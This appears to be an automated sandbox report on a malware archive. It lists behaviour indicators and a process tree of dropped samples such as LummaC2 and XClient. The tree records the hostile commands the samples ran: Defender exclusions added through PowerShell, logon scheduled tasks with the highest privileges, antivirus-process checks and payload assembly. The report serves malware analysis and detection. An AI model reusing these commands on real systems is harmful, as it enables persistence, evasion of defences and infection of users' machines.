Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2080	schtasks.exe
4008	schtasks.exe
1096	schtasks.exe
4464	schtasks.exe
3004	schtasks.exe
1204	schtasks.exe
3800	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1556	XClient.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
520	nano.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe
3064	kyhjasehs.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
680	7zFM.exe
520	nano.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
3460	sysnldcvmr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	680	7zFM.exe
Token: 35	680	7zFM.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeDebugPrivilege	1876	4363463463464363463463463.exe
Token: SeDebugPrivilege	520	nano.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeDebugPrivilege	4580	New Text Document mod.exe
Token: SeSecurityPrivilege	680	7zFM.exe
Token: SeDebugPrivilege	2640	client.exe
Token: SeDebugPrivilege	3064	kyhjasehs.exe
Token: SeRestorePrivilege	992	7z.exe
Token: 35	992	7z.exe
Token: SeSecurityPrivilege	992	7z.exe
Token: SeSecurityPrivilege	992	7z.exe
Token: SeRestorePrivilege	1788	7z.exe
Token: 35	1788	7z.exe
Token: SeSecurityPrivilege	1788	7z.exe
Token: SeSecurityPrivilege	1788	7z.exe
Token: SeDebugPrivilege	1096	intosvc.exe
Token: SeDebugPrivilege	1556	XClient.exe
Token: SeRestorePrivilege	4976	7z.exe
Token: 35	4976	7z.exe
Token: SeSecurityPrivilege	4976	7z.exe
Token: SeSecurityPrivilege	4976	7z.exe
Token: SeRestorePrivilege	4576	7z.exe
Token: 35	4576	7z.exe
Token: SeSecurityPrivilege	4576	7z.exe
Token: SeSecurityPrivilege	4576	7z.exe
Token: SeRestorePrivilege	652	7z.exe
Token: 35	652	7z.exe
Token: SeSecurityPrivilege	652	7z.exe
Token: SeSecurityPrivilege	652	7z.exe
Token: SeRestorePrivilege	4504	7z.exe
Token: 35	4504	7z.exe
Token: SeSecurityPrivilege	4504	7z.exe
Token: SeSecurityPrivilege	4504	7z.exe
Token: SeRestorePrivilege	2532	7z.exe
Token: 35	2532	7z.exe
Token: SeSecurityPrivilege	2532	7z.exe
Token: SeSecurityPrivilege	2532	7z.exe
Token: SeRestorePrivilege	2548	7z.exe
Token: 35	2548	7z.exe
Token: SeSecurityPrivilege	2548	7z.exe
Token: SeSecurityPrivilege	2548	7z.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	4696	tester.exe
Token: SeDebugPrivilege	3052	updater.exe
Token: SeDebugPrivilege	2532	explorer.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeLockMemoryPrivilege	4108	explorer.exe
Token: SeDebugPrivilege	1436	2968224716.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	2456	FACTURA-09876RT567800.exe
Token: SeDebugPrivilege	2932	yiklfON.exe
Token: SeDebugPrivilege	1580	tasklist.exe
Token: SeDebugPrivilege	2100	tasklist.exe
Token: SeDebugPrivilege	1156	updater.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeIncreaseQuotaPrivilege	1976	powershell.exe
Token: SeSecurityPrivilege	1976	powershell.exe

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
680	7zFM.exe
4364	Ul.pif
4364	Ul.pif
4364	Ul.pif
680	7zFM.exe
6172	M5iFR20.exe
6172	M5iFR20.exe
6172	M5iFR20.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4364	Ul.pif
4364	Ul.pif
4364	Ul.pif
6172	M5iFR20.exe
6172	M5iFR20.exe
6172	M5iFR20.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
5004	o.exe
4408	nothjgdwa.exe
1888	Gxtuum.exe
4824	cvv.exe
1736	csc.exe
4692	newtpp.exe
1556	XClient.exe
3932	LukeJazz.exe
4364	Ul.pif
1452	tester.exe
4892	mtbkkesfthae.exe
4788	LummaC2.exe
4468	pornhub_downloader.exe
3960	RegAsm.exe
5540	khtoawdltrha.exe
2832	Client.exe
5540	khtoawdltrha.exe
5724	NoEscape.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 680 wrote to memory of 1876	680	7zFM.exe	98
PID 680 wrote to memory of 1876	680	7zFM.exe	98
PID 680 wrote to memory of 1876	680	7zFM.exe	98
PID 1876 wrote to memory of 212	1876	4363463463464363463463463.exe	103
PID 1876 wrote to memory of 212	1876	4363463463464363463463463.exe	103
PID 1876 wrote to memory of 520	1876	4363463463464363463463463.exe	104
PID 1876 wrote to memory of 520	1876	4363463463464363463463463.exe	104
PID 1876 wrote to memory of 520	1876	4363463463464363463463463.exe	104
PID 680 wrote to memory of 4580	680	7zFM.exe	108
PID 680 wrote to memory of 4580	680	7zFM.exe	108
PID 1876 wrote to memory of 5004	1876	4363463463464363463463463.exe	111
PID 1876 wrote to memory of 5004	1876	4363463463464363463463463.exe	111
PID 1876 wrote to memory of 5004	1876	4363463463464363463463463.exe	111
PID 1876 wrote to memory of 4408	1876	4363463463464363463463463.exe	112
PID 1876 wrote to memory of 4408	1876	4363463463464363463463463.exe	112
PID 1876 wrote to memory of 4408	1876	4363463463464363463463463.exe	112
PID 4408 wrote to memory of 1888	4408	nothjgdwa.exe	113
PID 4408 wrote to memory of 1888	4408	nothjgdwa.exe	113
PID 4408 wrote to memory of 1888	4408	nothjgdwa.exe	113
PID 4580 wrote to memory of 2464	4580	New Text Document mod.exe	114
PID 4580 wrote to memory of 2464	4580	New Text Document mod.exe	114
PID 4580 wrote to memory of 2464	4580	New Text Document mod.exe	114
PID 4580 wrote to memory of 2640	4580	New Text Document mod.exe	115
PID 4580 wrote to memory of 2640	4580	New Text Document mod.exe	115
PID 1876 wrote to memory of 3064	1876	4363463463464363463463463.exe	116
PID 1876 wrote to memory of 3064	1876	4363463463464363463463463.exe	116
PID 5004 wrote to memory of 3460	5004	o.exe	118
PID 5004 wrote to memory of 3460	5004	o.exe	118
PID 5004 wrote to memory of 3460	5004	o.exe	118
PID 1876 wrote to memory of 4824	1876	4363463463464363463463463.exe	120
PID 1876 wrote to memory of 4824	1876	4363463463464363463463463.exe	120
PID 1876 wrote to memory of 4824	1876	4363463463464363463463463.exe	120
PID 3064 wrote to memory of 1736	3064	kyhjasehs.exe	123
PID 3064 wrote to memory of 1736	3064	kyhjasehs.exe	123
PID 1736 wrote to memory of 2840	1736	csc.exe	125
PID 1736 wrote to memory of 2840	1736	csc.exe	125
PID 4824 wrote to memory of 756	4824	cvv.exe	126
PID 4824 wrote to memory of 756	4824	cvv.exe	126
PID 4824 wrote to memory of 756	4824	cvv.exe	126
PID 3064 wrote to memory of 1344	3064	kyhjasehs.exe	127
PID 3064 wrote to memory of 1344	3064	kyhjasehs.exe	127
PID 1344 wrote to memory of 2800	1344	cmd.exe	129
PID 1344 wrote to memory of 2800	1344	cmd.exe	129
PID 1344 wrote to memory of 1372	1344	cmd.exe	130
PID 1344 wrote to memory of 1372	1344	cmd.exe	130
PID 2464 wrote to memory of 1920	2464	random.exe	132
PID 2464 wrote to memory of 1920	2464	random.exe	132
PID 1920 wrote to memory of 4288	1920	cmd.exe	185
PID 1920 wrote to memory of 4288	1920	cmd.exe	185
PID 756 wrote to memory of 408	756	WScript.exe	135
PID 756 wrote to memory of 408	756	WScript.exe	135
PID 756 wrote to memory of 408	756	WScript.exe	135
PID 1920 wrote to memory of 992	1920	cmd.exe	137
PID 1920 wrote to memory of 992	1920	cmd.exe	137
PID 1876 wrote to memory of 4008	1876	4363463463464363463463463.exe	138
PID 1876 wrote to memory of 4008	1876	4363463463464363463463463.exe	138
PID 1876 wrote to memory of 4008	1876	4363463463464363463463463.exe	138
PID 408 wrote to memory of 1096	408	cmd.exe	139
PID 408 wrote to memory of 1096	408	cmd.exe	139
PID 1920 wrote to memory of 1788	1920	cmd.exe	140
PID 1920 wrote to memory of 1788	1920	cmd.exe	140
PID 1876 wrote to memory of 1556	1876	4363463463464363463463463.exe	141
PID 1876 wrote to memory of 1556	1876	4363463463464363463463463.exe	141
PID 1920 wrote to memory of 4976	1920	cmd.exe	142

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 5 IoCs

Hidden Files and Directories

T1564.001

pid	Process
8664	attrib.exe
668	attrib.exe
3824	attrib.exe
4788	attrib.exe
6408	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	FACTURA-09876RT567800.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	FACTURA-09876RT567800.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3440
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\test-again.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\test-again.exe"
      4⤵
      Executes dropped EXE
      PID:212
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:520
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: SetClipboardViewer
        
        PID:3460
      - C:\Users\Admin\AppData\Local\Temp\2968224716.exe
        
        C:\Users\Admin\AppData\Local\Temp\2968224716.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:3860
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:4464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:4288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3648
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:2456
      - C:\Users\Admin\AppData\Local\Temp\2880822053.exe
        
        C:\Users\Admin\AppData\Local\Temp\2880822053.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\3532634971.exe
        
        C:\Users\Admin\AppData\Local\Temp\3532634971.exe
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:408
      - C:\Users\Admin\AppData\Local\Temp\3291433011.exe
        
        C:\Users\Admin\AppData\Local\Temp\3291433011.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2532
      - C:\Users\Admin\AppData\Local\Temp\3084722593.exe
        
        C:\Users\Admin\AppData\Local\Temp\3084722593.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2288
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4408
    - - C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe"
      4⤵
      Modifies WinLogon for persistence
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3064
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vcdzh2ia\vcdzh2ia.cmdline"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1736
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40DC.tmp" "c:\Windows\System32\CSC2CA6E1F3DA984E968ECE537E1EAC7E2.TMP"
        6⤵
        
        PID:2840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LjKwmZ1Yfd.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1344
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:2800
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:1372
      - C:\Users\Admin\AppData\Local\updater.exe
        
        "C:\Users\Admin\AppData\Local\updater.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jic4eklKP7.bat"
        7⤵
        
        PID:1684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2832
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\updater.exe
        
        "C:\Users\Admin\AppData\Local\updater.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vUeiK7j9e9.bat"
        9⤵
        
        PID:5144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:780
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\updater.exe
        
        "C:\Users\Admin\AppData\Local\updater.exe"
        10⤵
        
        PID:6200
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4824
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\MsChainWinSavesNet\JeuoTlIUFkP0JKjwMjJhvZCUZE7ZSPu8lUVQg7epfUxIOeMqBpEL003n4zid.vbe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:756
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\MsChainWinSavesNet\XeIJVXsH711dt3nzNM5xE4hYJepTgAq4zgx4OrxOJ6bMlIST.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:408
        
        C:\MsChainWinSavesNet\intosvc.exe
        
        "C:\MsChainWinSavesNet/intosvc.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JOrpebqBTx.bat"
        8⤵
        
        PID:1152
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3648
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:4464
        
        C:\Program Files (x86)\Google\Temp\explorer.exe
        
        "C:\Program Files (x86)\Google\Temp\explorer.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DvvzTrhuYJ.bat"
        10⤵
        
        PID:2236
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1844
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4248
        
        C:\Program Files (x86)\Google\Temp\explorer.exe
        
        "C:\Program Files (x86)\Google\Temp\explorer.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:4008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jvhcSLBvsS.bat"
        12⤵
        
        PID:4260
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:5536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6216
        
        C:\Program Files (x86)\Google\Temp\explorer.exe
        
        "C:\Program Files (x86)\Google\Temp\explorer.exe"
        13⤵
        
        PID:8560
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:4008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sCmXpCl.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:408
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sCmXpCl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1204
    - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2456
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\newtpp.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\newtpp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4692
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:3932
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k copy Decide Decide.cmd & Decide.cmd & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1396
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2760
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:992
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 437570
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3608
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BASEDADVERTISEAFGHANISTANCONTENT" Sacramento
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1012
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Avi + Hits + Joyce + Desk + Cheers + Cleanup + Generate + Hobbies + Possible + Rover + Notifications + Unique + Helpful + Constantly + Namibia + Revolution + Transfers + Index + Colors 437570\b
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4320
      - C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif
        
        437570\Ul.pif 437570\b
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4364
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\discord.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\discord.exe"
      4⤵
      Executes dropped EXE
      PID:4112
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3800
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2832
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\mtbkkesfthae.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\mtbkkesfthae.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LummaC2.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LummaC2.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4788
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\svhosts.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\svhosts.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2556
